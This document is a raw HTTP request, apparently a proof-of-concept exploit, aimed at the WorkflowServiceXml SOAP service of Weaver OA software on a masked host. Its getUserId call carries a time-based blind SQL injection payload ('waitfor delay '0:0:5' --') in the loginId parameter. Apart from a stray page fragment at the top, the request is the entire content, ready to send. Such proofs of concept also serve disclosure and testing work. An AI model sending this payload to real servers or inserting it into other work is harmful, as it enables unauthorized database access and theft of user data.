登录 白背景
POST http://XXX.XXX.XXX.XXX:8181/services/WorkflowServiceXml HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
Content-Length: 367

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:getUserId>
    <web:string>loginId = ? waitfor delay '0:0:5' -- </web:string>
        <web:string>zhangsan</web:string>
      </web:getUserId>
   </soapenv:Body>
</soapenv:Envelope>